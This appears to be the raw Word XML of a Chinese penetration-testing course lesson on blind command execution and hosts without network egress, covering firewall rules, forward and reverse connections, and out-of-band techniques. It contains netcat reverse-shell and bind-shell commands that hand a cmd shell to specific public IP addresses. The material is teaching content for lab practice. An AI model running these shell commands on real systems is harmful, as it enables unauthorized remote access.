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2C80" w14:textId="77777777" w:rsidR="003B7A56" w:rsidRPr="003B7A56" w:rsidRDefault="003B7A56" w:rsidP="003B7A56">
      <w:r w:rsidRPr="003B7A56">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基础入门-数据不回显&amp;数据不出网&amp;出入站策略&amp;正反向连接&amp;反弹Shell&amp;外带延迟写入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E93071D" w14:textId="07AD90CE" w:rsidR="003B7A56" w:rsidRPr="003B7A56" w:rsidRDefault="003B7A56" w:rsidP="003B7A56">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B7A56">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FF6E72A" wp14:editId="088C18A2">
            <wp:extent cx="5274310" cy="1047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AA7E" w14:textId="77777777" w:rsidR="003B7A56" w:rsidRPr="003B7A56" w:rsidRDefault="003B7A56" w:rsidP="003B7A56">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B7A56">
        <w:t>#知识点：</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>1、基础入门-Web应用-域名上的技术要点</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>2、基础入门-Web应用-源码上的技术要点</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>3、基础入门-Web应用-数据上的技术要点</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>4、基础入门-Web应用-解析上的技术要点</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>-----------------------------------------------------</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>1、基础入门-Web应用-搭建架构上的技术要点</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>2、基础入门-Web应用-源码类别上的技术要点</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>-----------------------------------------------------</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>1、基础入门-Web应用-防护产品-WAF保护</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>2、基础入门-Web应用-加速服务-CDN节点</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>3、基础入门-Web应用-文件托管-OSS存储</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>4、基础入门-Web应用-通讯服务-反向代理</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>5、基础入门-Web应用-运</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>维安全</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>-负载均衡</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>-----------------------------------------------------</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>1、基础入门-Web应用-蜜罐系统</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>2、基础入门-Web应用-堡垒机运维</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>3、基础入门-Web应用-内外API接口</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>4、基础入门-Web应用-第三方拓展架构</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>-----------------------------------------------------</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>1、基础入门-APP应用-开发架构安全问题</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>2、基础入门-小程序应用-开发架构安全问题</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>-----------------------------------------------------</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>1、抓包技术-Web应用-http/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>s-Burp&amp;Yakit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>2、抓包技术-APP应用-http/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>s-Burp&amp;Yakit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>3、抓包技术-PC端应用-http/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>s-Burp&amp;Yakit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>4、抓包技术-WX小程序-http/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>s-Burp&amp;Yakit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>5、抓包技术-软件联动-http/s-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>Proxifier</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>6、抓包技术-通用方案-http/s-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>ReqableApi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>7、抓包技术-其他工具-http/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>s-Fiddler&amp;Charles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>-----------------------------------------------------</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>1、抓包技术-HTTP/S双层代理-扶墙环境</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>2、抓包技术-HTTP/S上游</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>下游-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>项目联动</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>3、抓包技术-全局协议-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>WireShark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>&amp;科来</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>-----------------------------------------------------</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>1、数据不回</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>显原因</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>和解决-带外延迟反弹写文件</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>2、数据不出网原因和解决-出入站策略正反向连接</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t>#章节点：(待补充)</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>Web架构，App架构，小程序架构，前后端分离，容器技术，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>云产品</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>服务，</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>数据加解密算法，数据包抓取，数据包解析，正反向网络通讯，内外网通讯，</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>防火墙出入站，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>Windows&amp;Linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>渗透命令，WAF产品，负载均衡，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>加壳保护</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>等</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>#具体点：(待补充)</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>架构：WEB,APP,小程序,前后端,容器化等</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>服务：OSS存储,CDN加速,云数据库,负载均衡等</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>网络：不回显,反向代理,防火墙出入站,内外网,正反向连接等</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>算法：MD5,Base64,AES,DES,Salt,自定义,代码加密算法等</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>命令：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>Windows&amp;Linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>,文件下载,网络查看,反弹权限,用户等</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>防护：WAF防护,蜜罐系统,CDN加速,权限设置,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>加壳加密</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>反调试等</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618D7E23" w14:textId="68CF90BD" w:rsidR="003B7A56" w:rsidRPr="003B7A56" w:rsidRDefault="003B7A56" w:rsidP="003B7A56">
      <w:r w:rsidRPr="003B7A56">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E0F0B4D" wp14:editId="15BF593F">
            <wp:extent cx="5274310" cy="3141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E0CE" w14:textId="1E2799AE" w:rsidR="003B7A56" w:rsidRPr="003B7A56" w:rsidRDefault="003B7A56" w:rsidP="003B7A56">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B7A56">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32316908" wp14:editId="35E1452D">
            <wp:extent cx="5274310" cy="3161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FB61" w14:textId="77777777" w:rsidR="003B7A56" w:rsidRPr="003B7A56" w:rsidRDefault="003B7A56" w:rsidP="003B7A56">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B7A56">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>演示案例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43908916" w14:textId="77777777" w:rsidR="003B7A56" w:rsidRPr="003B7A56" w:rsidRDefault="003B7A56" w:rsidP="003B7A56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B7A56">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据不回显-原因解决-反弹&amp;带外&amp;延迟&amp;写文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE7EA76" w14:textId="77777777" w:rsidR="003B7A56" w:rsidRPr="003B7A56" w:rsidRDefault="003B7A56" w:rsidP="003B7A56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B7A56">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据不出网-原因解决-正反连接&amp;出入站策略&amp;隧道</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1A5FB2" w14:textId="77777777" w:rsidR="003B7A56" w:rsidRPr="003B7A56" w:rsidRDefault="003B7A56" w:rsidP="003B7A56">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B7A56">
        <w:t>#数据不回显-原因解决-反弹&amp;带外&amp;延迟&amp;写文件</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>原因：代码层面函数调用问题，没有输出测试等</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>过程：</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t xml:space="preserve">1、判断是不是数据不回显并且有漏洞 </w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>2、有这个漏洞如何把执行的数据到呢</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>解决：</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>1、反弹权限</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>判定目标的操作系统</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>https://forum.ywhack.com/shell.php</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>https://cloud.tencent.com/developer/article/1906240</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t xml:space="preserve"> -e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t xml:space="preserve"> 119.45.254.149 7777</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>lvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t xml:space="preserve"> 7777</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>2、数据带外</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>DNSlog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>TCP-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>Portlog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>ICMP-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>Sizelog</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>3、延迟判断</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>发包</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>看回显</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>时间</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>Win：ping -n 3 127.0.0.1</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>Linux：ping -c 3 127.0.0.1</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>4、</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>写访问</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>文件</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>写静态文件或写入可访问的文件确定</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>5、其他：根据环境</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>文件下载等（</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>反链的</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>意义）</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:lastRenderedPageBreak/>
        <w:t>#数据不出网-原因解决-正反连接&amp;出入站策略&amp;隧道</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>环境：Windows外网靶机 Linux外网攻击机</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>拓展思考：Windows内网靶机或Linux内网攻击机呢</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>流程：</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>1、判断出入限制</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>2、判断出入限制的端口和协议</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>3、分析原因用正向还是反向还是隧道</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>原因：主机或应用防火墙出站限制</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>解决：利用NC反弹实验</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>1、正向连接</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>2、反向连接</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>3、隧道技术</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>实验：相对于靶机角度</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>1、开启入站策略，采用反向连接</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>反向连接：主动给出去，对方监听</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>//绑定CMD到目标IP的6666端口</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t xml:space="preserve"> -e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t xml:space="preserve"> 146.56.193.187 6666</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>//等待6666连接</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>lvvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t xml:space="preserve"> 6666</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>2、开启出站策略，采用正向连接</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>正向连接：本地监听等待对方连接</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>//绑定CMD到本地6666端口</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t xml:space="preserve"> -e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>lvvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t xml:space="preserve"> 6666</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>//主动连接目标6666</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t xml:space="preserve"> 43.134.218.194 6666</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>3、开启出站策略，采用其他协议隧道</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>ICMP,DNS等隧道技术</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>由上述内容发现还</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>需那些</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>内容学习：</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>1、其他反弹项目使用 工具或自</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003B7A56">
        <w:t>带命令</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>2、系统操作命令使用 文件下载</w:t>
      </w:r>
      <w:r w:rsidRPr="003B7A56">
        <w:br/>
        <w:t>3、复杂内网通讯隧道</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4739E416" w14:textId="246A5F4E" w:rsidR="00AD7B8B" w:rsidRPr="003B7A56" w:rsidRDefault="003B7A56">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B7A56">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>涉及资源：</w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="003B7A56">
          <w:rPr>
            <w:rStyle w:val="ae"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>资源下载地址</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:sectPr w:rsidR="00AD7B8B" w:rsidRPr="003B7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8232F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="021A05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09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E8"/>
    <w:rsid w:val="003B7A56"/>
    <w:rsid w:val="00450B55"/>
    <w:rsid w:val="006115B8"/>
    <w:rsid w:val="0077064E"/>
    <w:rsid w:val="007C31F6"/>
    <w:rsid w:val="008F1D67"/>
    <w:rsid w:val="00AD7B8B"/>
    <w:rsid w:val="00E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601A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{40383AFC-B189-480B-A831-F63E2BF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19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9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9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9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9E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9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9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9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19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19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19E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19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19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19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19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19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19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19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19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19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19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19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19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19E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B7A5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B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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-11-29T01:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-29T01:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>